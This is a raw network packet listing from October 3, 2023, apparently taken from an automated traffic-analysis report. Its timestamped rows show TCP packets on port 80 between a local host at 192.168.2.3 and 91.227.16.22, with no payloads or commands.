                                                                    Oct 3, 2023 09:55:09.751008034 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751022100 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751066923 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751091957 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751147032 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751199961 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751209974 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751277924 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751318932 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751353025 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751461983 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751502991 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751513004 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751588106 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751627922 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751671076 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751763105 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751802921 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751813889 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751888037 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751926899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751926899 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.751960993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.751997948 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.752021074 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752055883 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752094030 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.752095938 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752259970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752316952 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.752346992 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752408981 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752450943 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.752504110 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752613068 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752650976 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.752681971 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752752066 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752789974 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.752861977 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752940893 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.752979040 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.753011942 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753086090 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753124952 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.753201962 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753264904 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753303051 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.753369093 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753437042 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753478050 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.753622055 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753712893 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753751040 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.753840923 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753928900 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.753967047 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754009962 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754081011 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754122019 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754154921 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754215956 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754256010 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754268885 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754293919 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754339933 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754364967 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754410028 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754479885 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754484892 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754523993 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754591942 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754630089 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754720926 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754797935 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.754842997 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.754910946 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755012035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755052090 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755080938 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755191088 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755244017 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755254984 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755306005 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755374908 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755377054 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755465984 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755515099 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755547047 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755645037 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755686045 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755717993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755769014 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755810022 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755836010 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755876064 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.755913973 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.755939007 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756026983 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756063938 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.756089926 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756167889 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756205082 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756217957 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.756248951 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756289005 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.756300926 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756342888 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.756385088 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.756397963 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758661985 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758724928 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.758838892 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758855104 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758868933 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758881092 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758893013 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758898973 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.758905888 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758919001 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758919954 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.758932114 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758944035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758944988 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.758958101 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758970022 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758980036 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.758984089 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758996964 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.758999109 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759011030 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759021997 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759025097 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759037018 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759048939 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759053946 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759061098 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759073973 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759074926 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759085894 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759095907 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759100914 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759115934 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759129047 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759133101 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759140968 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759154081 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759155989 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759166956 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759179115 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759177923 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759198904 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759212017 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759212017 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759223938 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759236097 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759243011 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759248018 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759260893 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759268999 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759273052 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759287119 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759289026 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759299994 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759306908 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759314060 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759327888 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759345055 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759385109 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759387970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759491920 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759540081 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759603024 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759701014 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759742975 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759799004 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759887934 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.759928942 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.759970903 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760070086 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760111094 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.760153055 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760248899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760292053 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.760334969 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760432005 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760471106 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.760514021 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760597944 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760641098 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.760648012 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760720015 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760771036 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.760796070 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760859966 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.760899067 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.760941029 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761038065 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761082888 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.761113882 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761178970 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761220932 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.761265993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761353016 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761390924 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.761435032 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761548996 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761591911 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.761614084 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761687994 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761729956 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.761775017 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761864901 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.761907101 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.761950016 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762052059 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762093067 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.762124062 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762227058 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762268066 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.762300014 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762397051 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762439966 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.762471914 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762551069 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762590885 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.762636900 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762731075 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762772083 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.762794018 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762867928 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762906075 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.762907982 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763010979 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763066053 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763098955 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763169050 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763211012 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763242960 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763380051 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763420105 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763442993 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763552904 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763593912 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763637066 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763741016 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763781071 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763813019 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763874054 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.763914108 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.763942003 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764010906 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764050961 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.764089108 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764194012 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764236927 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.764280081 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764350891 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764394045 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.764426947 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764502048 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764542103 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.764561892 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764642000 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764683008 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.764714956 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764821053 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764861107 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.764904022 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.764987946 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765027046 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765099049 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765166044 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765204906 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765225887 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765300035 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765337944 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765338898 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765398979 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765438080 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765481949 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765557051 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765595913 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765597105 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765630007 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765670061 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765702009 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765760899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765799999 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765824080 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765881062 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765921116 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.765932083 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.765963078 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766011953 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766025066 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766056061 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766096115 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766122103 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766176939 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766216993 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766248941 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766293049 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766333103 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766357899 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766417027 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766453981 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766457081 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766513109 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766549110 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766554117 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766614914 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766655922 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766686916 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766746044 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766788960 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.766875029 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.766964912 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767004967 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.767026901 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767102957 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767142057 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.767185926 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767262936 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767302990 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.767334938 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767445087 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767486095 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.767518044 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767611980 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767652988 CEST4981680192.168.2.391.227.16.22
                                                                    Oct 3, 2023 09:55:09.767697096 CEST804981691.227.16.22192.168.2.3
                                                                    Oct 3, 2023 09:55:09.767793894 CEST804981691.227.16.22192.168.2.3
